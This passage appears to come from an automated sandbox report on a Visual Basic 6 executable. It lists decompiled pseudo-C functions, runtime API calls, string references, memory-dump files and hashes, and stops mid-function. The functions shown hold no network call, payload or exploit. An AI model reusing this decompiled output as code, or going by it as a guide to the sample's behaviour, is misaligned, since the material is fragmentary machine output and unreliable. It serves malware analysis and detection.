__vbaChkstk.MSVBVM60(?,00000000), ref: 004179E6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB3C,000000F4,?,?,00000000), ref: 00417A3D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00417A5B
__vbaFreeStr.MSVBVM60(00417A8D), ref: 00417A87

Strings

p"w, xrefs: 00417839, 00417842, 00417851, 0041785A, 004178C0, 004178C9, 004178D8, 004178E1, 00417943, 0041794C, 0041795B, 00417967

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$#611ListMove
String ID: p"w
API String ID: 257577118-3261273085
Opcode ID: a8d9117518c50324060573aef0e3910dfcdee715c386ee0e728d7a1c378a1126
Instruction ID: 6766d0713e1b41ce37cdb422a3644a8959ed1bb0e3ad9598084a0918d32ff9d2
Opcode Fuzzy Hash: a8d9117518c50324060573aef0e3910dfcdee715c386ee0e728d7a1c378a1126
Instruction Fuzzy Hash: 0F71F571E00208DBCB10EFA1C849BDDBBB5FF08704F20846AE515BB2A1DB795A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041819E, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041819E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				char* _t81;
				signed int _t84;
				char* _t88;
				signed int _t92;
				char* _t97;
				signed int _t101;
				intOrPtr _t102;
				void* _t124;
				void* _t126;
				intOrPtr _t127;

				_t127 = _t126 - 0xc;
				 *[fs:0x0] = _t127;
				L004015E0();
				_v16 = _t127;
				_v12 = 0x401500;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4015e6, _t124);
				if( *0x41b010 != 0) {
					_v92 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v92 = 0x41b010;
				}
				_t81 =  &_v36;
				L00401862();
				_v76 = _t81;
				_t84 =  *((intOrPtr*)( *_v76 + 0x180))(_v76, _t81,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x300))( *_v92));
				asm("fclex");
				_v80 = _t84;
				if(_v80 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40eae4);
					_push(_v76);
					_push(_v80);
					L00401856();
					_v96 = _t84;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v100 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v100 = 0x41b010;
				}
				_t88 =  &_v36;
				L00401862();
				_v76 = _t88;
				_v60 = 0x80020004;
				_v68 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t92 =  *((intOrPtr*)( *_v76 + 0x198))(_v76, 0x10, _t88,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x308))( *_v100));
				asm("fclex");
				_v80 = _t92;
				if(_v80 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x40eed8);
					_push(_v76);
					_push(_v80);
					L00401856();
					_v104 = _t92;
				}
				L00401850();
				_v44 = 0x17;
				_v52 = 2;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_push( &_v52);
				L004016AC();
				L00401814();
				L00401838();
				if( *0x41b010 != 0) {
					_v108 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v108 = 0x41b010;
				}
				_t97 =  &_v36;
				L00401862();
				_v76 = _t97;
				_t101 =  *((intOrPtr*)( *_v76 + 0x178))(_v76,  &_v72, _t97,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x348))( *_v108));
				asm("fclex");
				_v80 = _t101;
				if(_v80 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40eac4);
					_push(_v76);
					_push(_v80);
					L00401856();
					_v112 = _t101;
				}
				_t102 = _v72;
				_v32 = _t102;
				L00401850();
				_push(0x4183ee);
				L0040182C();
				return _t102;
			}

0x004181a1
0x004181b0
0x004181ba
0x004181c2
0x004181c5
0x004181cc
0x004181db
0x004181e5
0x004181ff
0x004181e7
0x004181e7
0x004181ec
0x004181f1
0x004181f6
0x004181f6
0x0041821a
0x0041821e
0x00418223
0x0041822e
0x00418234
0x00418236
0x0041823d
0x00418259
0x0041823f
0x0041823f
0x00418244
0x00418249
0x0041824c
0x0041824f
0x00418254
0x00418254
0x00418260
0x0041826c
0x00418286
0x0041826e
0x0041826e
0x00418273
0x00418278
0x0041827d
0x0041827d
0x004182a1
0x004182a5
0x004182aa
0x004182ad
0x004182b4
0x004182be
0x004182c8
0x004182c9
0x004182ca
0x004182cb
0x004182d4
0x004182da
0x004182dc
0x004182e3
0x004182ff
0x004182e5
0x004182e5
0x004182ea
0x004182ef
0x004182f2
0x004182f5
0x004182fa
0x004182fa
0x00418306
0x0041830b
0x00418312
0x00418319
0x0041831b
0x0041831d
0x0041831f
0x00418324
0x00418325
0x0041832f
0x00418337
0x00418343
0x0041835d
0x00418345
0x00418345
0x0041834a
0x0041834f
0x00418354
0x00418354
0x00418378
0x0041837c
0x00418381
0x00418390
0x00418396
0x00418398
0x0041839f
0x004183bb
0x004183a1
0x004183a1
0x004183a6
0x004183ab
0x004183ae
0x004183b1
0x004183b6
0x004183b6
0x004183bf
0x004183c2
0x004183c8
0x004183cd
0x004183e8
0x004183ed

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004181BA
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 004181F1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041821E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000180), ref: 0041824F
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,00000180), ref: 00418260
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00418278
__vbaObjSet.MSVBVM60(?,00000000), ref: 004182A5
__vbaChkstk.MSVBVM60(?,00000000), ref: 004182BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EED8,00000198), ref: 004182F5
__vbaFreeObj.MSVBVM60(00000000,?,0040EED8,00000198), ref: 00418306
#702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00418325
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041832F
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 00418337
__vbaNew2.MSVBVM60(0040F3CC,p"w,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041834F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041837C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,00000178), ref: 004183B1
__vbaFreeObj.MSVBVM60(00000000,?,0040EAC4,00000178), ref: 004183C8
__vbaFreeStr.MSVBVM60(004183EE), ref: 004183E8

Strings

p"w, xrefs: 004181DE, 004181E7, 004181F6, 004181FF, 00418265, 0041826E, 0041827D, 00418286, 0041833C, 00418345, 00418354, 0041835D

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$Chkstk$#702Move
String ID: p"w
API String ID: 3303628595-3261273085
Opcode ID: 726b7fe6dc3834e41e64b87f1cca4ee00848086ff9b43fd5b18a45f1621c8b9d
Instruction ID: 369c1c9796282547754285ce755795b917b09108c866b9eae4bef713c93a425a
Opcode Fuzzy Hash: 726b7fe6dc3834e41e64b87f1cca4ee00848086ff9b43fd5b18a45f1621c8b9d
Instruction Fuzzy Hash: 1D610571E00208AFCB11EFA1C849BDDBBB5FF09714F24442AE026BB2A1DB795585DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00419B91, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00419B91(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				signed int _t59;
				signed int _t62;
				char* _t63;
				signed int _t65;
				signed int _t69;
				signed int _t72;
				intOrPtr _t96;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				_push(0x4c);
				L004015E0();
				_v12 = _t96;
				_v8 = 0x4015c8;
				L00401820();
				if( *0x41b010 != 0) {
					_v88 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v88 = 0x41b010;
				}
				_t59 =  &_v40;
				L00401862();
				_v76 = _t59;
				_t62 =  *((intOrPtr*)( *_v76 + 0x1d8))(_v76, _t59,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x348))( *_v88));
				asm("fclex");
				_v80 = _t62;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x40eac4);
					_push(_v76);
					_push(_v80);
					L00401856();
					_v92 = _t62;
				}
				L00401850();
				_v64 = 0x40ecc0;
				_v72 = 8;
				L004017AE();
				_t63 =  &_v56;
				_push(_t63);
				L00401676();
				_v76 =  ~(0 | _t63 != 0x00000008);
				L00401838();
				if(_v76 != 0) {
					_t72 =  *((intOrPtr*)( *_a4 + 0x728))(_a4);
					_v76 = _t72;
					if(_v76 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x728);
						_push(0x40e764);
						_push(_a4);
						_push(_v76);
						L00401856();
						_v96 = _t72;
					}
				}
				_v48 = 0xe;
				_v56 = 2;
				_t65 =  &_v56;
				_push(_t65);
				L00401670();
				L00401814();
				_push(_t65);
				_push(L"Out of string space");
				L00401772();
				asm("sbb eax, eax");
				_v76 =  ~( ~( ~_t65));
				L0040182C();
				L00401838();
				_t69 = _v76;
				if(_t69 != 0) {
					_push(0x82);
					L00401742();
					_v24 = _t69;
				}
				_v28 =  *0x4015c0;
				asm("wait");
				_push(0x419d58);
				L0040182C();
				return _t69;
			}

0x00419b96
0x00419ba1
0x00419ba2
0x00419ba9
0x00419bac
0x00419bb4
0x00419bb7
0x00419bc4
0x00419bd0
0x00419bea
0x00419bd2
0x00419bd2
0x00419bd7
0x00419bdc
0x00419be1
0x00419be1
0x00419c05
0x00419c09
0x00419c0e
0x00419c19
0x00419c1f
0x00419c21
0x00419c28
0x00419c44
0x00419c2a
0x00419c2a
0x00419c2f
0x00419c34
0x00419c37
0x00419c3a
0x00419c3f
0x00419c3f
0x00419c4b
0x00419c50
0x00419c57
0x00419c64
0x00419c69
0x00419c6c
0x00419c6d
0x00419c7c
0x00419c83
0x00419c8e
0x00419c98
0x00419c9e
0x00419ca5
0x00419cc1
0x00419ca7
0x00419ca7
0x00419cac
0x00419cb1
0x00419cb4
0x00419cb7
0x00419cbc
0x00419cbc
0x00419ca5
0x00419cc5
0x00419ccc
0x00419cd3
0x00419cd6
0x00419cd7
0x00419ce1
0x00419ce6
0x00419ce7
0x00419cec
0x00419cf3
0x00419cf9
0x00419d00
0x00419d08
0x00419d0d
0x00419d13
0x00419d15
0x00419d1a
0x00419d22
0x00419d22
0x00419d2b
0x00419d2e
0x00419d2f
0x00419d52
0x00419d57

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00419BAC
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00419BC4
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 00419BDC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419C09
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,000001D8), ref: 00419C3A
__vbaFreeObj.MSVBVM60(00000000,?,0040EAC4,000001D8), ref: 00419C4B
__vbaVarDup.MSVBVM60(00000000,?,0040EAC4,000001D8), ref: 00419C64
#563.MSVBVM60(?), ref: 00419C6D
__vbaFreeVar.MSVBVM60(?), ref: 00419C83
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E764,00000728), ref: 00419CB7
#651.MSVBVM60(00000002,?), ref: 00419CD7
__vbaStrMove.MSVBVM60(00000002,?), ref: 00419CE1
__vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002,?), ref: 00419CEC
__vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002,?), ref: 00419D00
__vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002,?), ref: 00419D08
#571.MSVBVM60(00000082,Out of string space,00000000,00000002,?), ref: 00419D1A
__vbaFreeStr.MSVBVM60(00419D58,Out of string space,00000000,00000002,?), ref: 00419D52

Strings

p"w, xrefs: 00419BC9, 00419BD2, 00419BE1, 00419BEA
Out of string space, xrefs: 00419CE7

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#563#571#651ChkstkCopyMoveNew2
String ID: Out of string space$p"w
API String ID: 3490022993-3830313032
Opcode ID: fed4736979c0ff14192e74db9c6964bfadbf601ea5964130cc487547d510f8ae
Instruction ID: a8e618e2c8fef8fb91bbe833c024ccbc945b1b671e6c60c53e9da9863a2f9765
Opcode Fuzzy Hash: fed4736979c0ff14192e74db9c6964bfadbf601ea5964130cc487547d510f8ae
Instruction Fuzzy Hash: 30410E71D00208AFDB04EFA1D955BED7BB4FF04744F10842AF006BB2A1EB785A45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00418E81, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00418E81(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				char _v32;
				signed int _v40;
				char _v48;
				char _v64;
				void* _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				char* _t71;
				signed int _t74;
				short _t78;
				char* _t82;
				signed int _t86;
				char* _t93;
				intOrPtr _t105;
				long long* _t106;
				signed int _t108;
				char _t110;

				_t110 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t105;
				_push(0x60);
				L004015E0();
				_v12 = _t105;
				_v8 = 0x401558;
				_v40 = 2;
				_v48 = 2;
				_push( &_v48);
				_push( &_v64);
				L0040168E();
				_push( &_v64);
				L0040180E();
				L00401814();
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L004017BA();
				_t106 = _t105 + 0xc;
				if( *0x41b010 != 0) {
					_v100 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v100 = 0x41b010;
				}
				_t71 =  &_v32;
				L00401862();
				_v88 = _t71;
				_t74 =  *((intOrPtr*)( *_v88 + 0x20c))(_v88, _t71,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x318))( *_v100));
				asm("fclex");
				_v92 = _t74;
				_t108 = _v92;
				if(_t108 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x20c);
					_push(0x40ea8c);
					_push(_v88);
					_push(_v92);
					L00401856();
					_v104 = _t74;
				}
				_t93 =  &_v32;
				L00401850();
				_v40 = 1;
				_v48 = 2;
				_push( &_v48);
				asm("fld1");
				_push(_t93);
				_push(_t93);
				 *_t106 = _t110;
				asm("fld1");
				_push(_t93);
				_push(_t93);
				 *_t106 = _t110;
				asm("fld1");
				_push(_t93);
				_push(_t93);
				_v88 = _t110;
				_push(_t93);
				_push(_t93);
				 *_t106 =  *0x401550;
				L00401688();
				L004017C6();
				asm("fcomp qword [0x401548]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t108 == 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_v108 = 1;
				}
				_v88 =  ~_v108;
				L00401838();
				_t78 = _v88;
				if(_t78 == 0) {
					if( *0x41b010 != 0) {
						_v112 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v112 = 0x41b010;
					}
					_t82 =  &_v32;
					L00401862();
					_v88 = _t82;
					_t86 =  *((intOrPtr*)( *_v88 + 0xd8))(_v88,  &_v84, _t82,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x2fc))( *_v112));
					asm("fclex");
					_v92 = _t86;
					if(_v92 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x40eae4);
						_push(_v88);
						_push(_v92);
						L00401856();
						_v116 = _t86;
					}
					_t78 = _v84;
					_v28 = _t78;
					L00401850();
				}
				asm("wait");
				_push(0x4190a6);
				L0040182C();
				return _t78;
			}

0x00418e81
0x00418e86
0x00418e91
0x00418e92
0x00418e99
0x00418e9c
0x00418ea4
0x00418ea7
0x00418eae
0x00418eb5
0x00418ebf
0x00418ec3
0x00418ec4
0x00418ecc
0x00418ecd
0x00418ed7
0x00418edf
0x00418ee3
0x00418ee4
0x00418ee6
0x00418eeb
0x00418ef5
0x00418f0f
0x00418ef7
0x00418ef7
0x00418efc
0x00418f01
0x00418f06
0x00418f06
0x00418f2a
0x00418f2e
0x00418f33
0x00418f3e
0x00418f44
0x00418f46
0x00418f49
0x00418f4d
0x00418f69
0x00418f4f
0x00418f4f
0x00418f54
0x00418f59
0x00418f5c
0x00418f5f
0x00418f64
0x00418f64
0x00418f6d
0x00418f70
0x00418f75
0x00418f7c
0x00418f86
0x00418f87
0x00418f89
0x00418f8a
0x00418f8b
0x00418f8e
0x00418f90
0x00418f91
0x00418f92
0x00418f95
0x00418f97
0x00418f98
0x00418f99
0x00418fa2
0x00418fa3
0x00418fa4
0x00418fa7
0x00418fac
0x00418fb1
0x00418fb7
0x00418fb9
0x00418fba
0x00418fc5
0x00418fbc
0x00418fbc
0x00418fbc
0x00418fce
0x00418fd5
0x00418fda
0x00418fe0
0x00418fee
0x00419008
0x00418ff0
0x00418ff0
0x00418ff5
0x00418ffa
0x00418fff
0x00418fff
0x00419023
0x00419027
0x0041902c
0x0041903b
0x00419041
0x00419043
0x0041904a
0x00419066
0x0041904c
0x0041904c
0x00419051
0x00419056
0x00419059
0x0041905c
0x00419061
0x00419061
0x0041906a
0x0041906e
0x00419075
0x00419075
0x0041907a
0x0041907b
0x004190a0
0x004190a5

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00418E9C
#613.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418EC4
__vbaStrVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418ECD
__vbaStrMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418ED7
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002,?,?,?,?,?,?,?,?,004015E6), ref: 00418EE6
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00418F01
__vbaObjSet.MSVBVM60(?,00000000), ref: 00418F2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,0000020C), ref: 00418F5F
__vbaFreeObj.MSVBVM60(00000000,?,0040EA8C,0000020C), ref: 00418F70
#673.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00418FA7
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00418FAC
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00418FD5
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,?,?,?,?,00000002), ref: 00418FFA
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000002), ref: 00419027
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,000000D8,?,?,?,?,?,?,?,?,00000002), ref: 0041905C
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000002), ref: 00419075
__vbaFreeStr.MSVBVM60(004190A6,?,?,?,?,?,?,?,?,00000002), ref: 004190A0

Strings

p"w, xrefs: 00418EEE, 00418EF7, 00418F06, 00418F0F, 00418FE7, 00418FF0, 00418FFF, 00419008

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMoveNew2$#613#673ChkstkList
String ID: p"w
API String ID: 1766932802-3261273085
Opcode ID: 8e7c465c053da076a3bd7703a90a78418b2c5f6b59a357cebceb88d0b1b8b7eb
Instruction ID: 3eaa0806a7d91184ee37668b19f4114f6766946c6e2be26bf9bdb715bc317bf7
Opcode Fuzzy Hash: 8e7c465c053da076a3bd7703a90a78418b2c5f6b59a357cebceb88d0b1b8b7eb
Instruction Fuzzy Hash: A351DE71D00208AFCB04EFD1C949BEEBBB9FB08704F10852EE016BB2A1DB795945DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041418E, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041418E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr* _v80;
				signed char _v84;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed char _v108;
				char* _t63;
				signed int _t67;
				char* _t71;
				signed char _t77;
				signed short _t78;
				intOrPtr _t86;
				void* _t98;
				void* _t100;
				intOrPtr _t101;

				_t101 = _t100 - 0xc;
				 *[fs:0x0] = _t101;
				L004015E0();
				_v16 = _t101;
				_v12 = 0x401308;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x54,  *[fs:0x0], 0x4015e6, _t98);
				if( *0x41b010 != 0) {
					_v96 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v96 = 0x41b010;
				}
				_t63 =  &_v28;
				L00401862();
				_v80 = _t63;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t67 =  *((intOrPtr*)( *_v80 + 0x1ec))(_v80, L"Endagsbillet", 0x10, _t63,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x318))( *_v96));
				asm("fclex");
				_v84 = _t67;
				if(_v84 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x40ea8c);
					_push(_v80);
					_push(_v84);
					L00401856();
					_v100 = _t67;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v104 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v104 = 0x41b010;
				}
				_t86 =  *((intOrPtr*)( *_v104));
				_t71 =  &_v28;
				L00401862();
				_v80 = _t71;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v76 =  *0x401300;
				_t77 =  *((intOrPtr*)( *_v80 + 0x204))(_v80, _t86, 0x10, 0x10, 0x10, _t71,  *((intOrPtr*)(_t86 + 0x318))( *_v104));
				asm("fclex");
				_v84 = _t77;
				if(_v84 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x204);
					_push(0x40ea8c);
					_push(_v80);
					_push(_v84);
					L00401856();
					_v108 = _t77;
				}
				L00401850();
				_push(0x40ecc0);
				L004017D2();
				_t78 = _t77 & 0x000000ff;
				if(_t78 != 0x61) {
					_push(L"Seceding");
					L004017CC();
				}
				asm("wait");
				_push(0x414397);
				return _t78;
			}

0x00414191
0x004141a0
0x004141aa
0x004141b2
0x004141b5
0x004141bc
0x004141cb
0x004141d5
0x004141ef
0x004141d7
0x004141d7
0x004141dc
0x004141e1
0x004141e6
0x004141e6
0x0041420a
0x0041420e
0x00414213
0x00414216
0x0041421d
0x00414227
0x00414231
0x00414232
0x00414233
0x00414234
0x00414242
0x00414248
0x0041424a
0x00414251
0x0041426d
0x00414253
0x00414253
0x00414258
0x0041425d
0x00414260
0x00414263
0x00414268
0x00414268
0x00414274
0x00414280
0x0041429a
0x00414282
0x00414282
0x00414287
0x0041428c
0x00414291
0x00414291
0x004142ab
0x004142b5
0x004142b9
0x004142be
0x004142c1
0x004142c8
0x004142cf
0x004142d6
0x004142dd
0x004142e4
0x004142ee
0x004142f8
0x004142f9
0x004142fa
0x004142fb
0x004142ff
0x00414309
0x0041430a
0x0041430b
0x0041430c
0x00414310
0x0041431a
0x0041431b
0x0041431c
0x0041431d
0x00414325
0x00414330
0x00414336
0x00414338
0x0041433f
0x0041435b
0x00414341
0x00414341
0x00414346
0x0041434b
0x0041434e
0x00414351
0x00414356
0x00414356
0x00414362
0x00414367
0x0041436c
0x00414371
0x00414379
0x0041437b
0x00414380
0x00414380
0x00414385
0x00414386
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004141AA
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 004141E1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041420E
__vbaChkstk.MSVBVM60(?,00000000), ref: 00414227
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 00414263
__vbaFreeObj.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 00414274
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 0041428C
__vbaObjSet.MSVBVM60(?,00000000), ref: 004142B9
__vbaChkstk.MSVBVM60(?,00000000), ref: 004142EE
__vbaChkstk.MSVBVM60(?,00000000), ref: 004142FF
__vbaChkstk.MSVBVM60(?,00000000), ref: 00414310
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,00000204,?,?,00000000), ref: 00414351
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 00414362
#693.MSVBVM60(0040ECC0,?,?,00000000), ref: 0041436C
#532.MSVBVM60(Seceding,0040ECC0,?,?,00000000), ref: 00414380

Strings

Seceding, xrefs: 0041437B
p"w, xrefs: 004141CE, 004141D7, 004141E6, 004141EF, 00414279, 00414282, 00414291, 0041429A
Endagsbillet, xrefs: 00414235

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2$#532#693
String ID: Endagsbillet$Seceding$p"w
API String ID: 1916466305-4271731
Opcode ID: c75b47223256f302a9afce806cc00d5e8f3c6774087fd92e7f211335cb3f6d6f
Instruction ID: 1e7e0f426fbd388e8c397971a14d9b370ac2b71afc0f602677acc7481ceea998
Opcode Fuzzy Hash: c75b47223256f302a9afce806cc00d5e8f3c6774087fd92e7f211335cb3f6d6f
Instruction Fuzzy Hash: 84512871E00308ABCB01EF91C846BDEBBB5FF49714F20442AF911BB2A1D7B95586DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415F32, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00415F32(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
